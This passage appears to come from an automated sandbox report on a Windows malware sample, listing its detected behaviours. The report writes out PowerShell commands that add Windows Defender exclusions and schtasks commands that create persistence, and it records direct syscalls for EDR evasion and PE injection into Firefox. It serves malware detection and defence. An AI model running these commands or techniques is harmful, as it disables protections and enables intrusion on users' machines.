                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A8AA0 mov eax, dword ptr fs:[00000030h]9_2_018A8AA0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A8AA0 mov eax, dword ptr fs:[00000030h]9_2_018A8AA0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018F6AA4 mov eax, dword ptr fs:[00000030h]9_2_018F6AA4
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018F6ACC mov eax, dword ptr fs:[00000030h]9_2_018F6ACC
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018F6ACC mov eax, dword ptr fs:[00000030h]9_2_018F6ACC
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018F6ACC mov eax, dword ptr fs:[00000030h]9_2_018F6ACC
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A0AD0 mov eax, dword ptr fs:[00000030h]9_2_018A0AD0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D4AD0 mov eax, dword ptr fs:[00000030h]9_2_018D4AD0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D4AD0 mov eax, dword ptr fs:[00000030h]9_2_018D4AD0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DAAEE mov eax, dword ptr fs:[00000030h]9_2_018DAAEE
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DAAEE mov eax, dword ptr fs:[00000030h]9_2_018DAAEE
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192CA11 mov eax, dword ptr fs:[00000030h]9_2_0192CA11
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CEA2E mov eax, dword ptr fs:[00000030h]9_2_018CEA2E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DCA24 mov eax, dword ptr fs:[00000030h]9_2_018DCA24
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DCA38 mov eax, dword ptr fs:[00000030h]9_2_018DCA38
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C4A35 mov eax, dword ptr fs:[00000030h]9_2_018C4A35
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C4A35 mov eax, dword ptr fs:[00000030h]9_2_018C4A35
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0A5B mov eax, dword ptr fs:[00000030h]9_2_018B0A5B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0A5B mov eax, dword ptr fs:[00000030h]9_2_018B0A5B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A6A50 mov eax, dword ptr fs:[00000030h]9_2_018A6A50
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A6A50 mov eax, dword ptr fs:[00000030h]9_2_018A6A50
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe"
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"Jump to behavior
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtQueryAttributesFile: Direct from: 0x76EF2E6C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtQuerySystemInformation: Direct from: 0x76EF48CC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtOpenSection: Direct from: 0x76EF2E0C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtDeviceIoControlFile: Direct from: 0x76EF2AEC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtQueryValueKey: Direct from: 0x76EF2BEC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtQueryInformationToken: Direct from: 0x76EF2CAC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtCreateFile: Direct from: 0x76EF2FEC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtOpenFile: Direct from: 0x76EF2DCC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtTerminateThread: Direct from: 0x76EF2FCC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtOpenKeyEx: Direct from: 0x76EF2B9C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtSetInformationProcess: Direct from: 0x76EF2C5C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtNotifyChangeKey: Direct from: 0x76EF3C2C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtCreateMutant: Direct from: 0x76EF35CC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtResumeThread: Direct from: 0x76EF36AC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtMapViewOfSection: Direct from: 0x76EF2D1C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2E
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtQuerySystemInformation: Direct from: 0x76EF2DFC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtDelayExecution: Direct from: 0x76EF2DDC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtQueryInformationProcess: Direct from: 0x76EF2C26
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtOpenKeyEx: Direct from: 0x76EF3C9C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtSetInformationThread: Direct from: 0x76EE63F9
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtClose: Direct from: 0x76EF2B6C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtSetInformationThread: Direct from: 0x76EF2B4C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeNtCreateKey: Direct from: 0x76EF2C6C
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\SysWOW64\print.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF79F9E0000 value starts with: 4D5AJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: NULL target: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: NULL target: C:\Windows\SysWOW64\print.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: NULL target: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: NULL target: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                    Queues an APC in another process (thread injection)
                    Source: C:\Windows\SysWOW64\print.exeThread APC queued: target process: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Windows\SysWOW64\print.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF79F9E0000Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Users\user\Desktop\UnmxRI.exe "C:\Users\user\Desktop\UnmxRI.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"Jump to behavior
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeProcess created: C:\Windows\SysWOW64\print.exe "C:\Windows\SysWOW64\print.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\print.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4495132332.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152516352.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495197692.0000000001691000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                    Source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4495132332.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152516352.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495197692.0000000001691000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4495132332.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152516352.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495197692.0000000001691000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4495132332.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152516352.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495197692.0000000001691000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\UnmxRI.exeQueries volume information: C:\Users\user\Desktop\UnmxRI.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
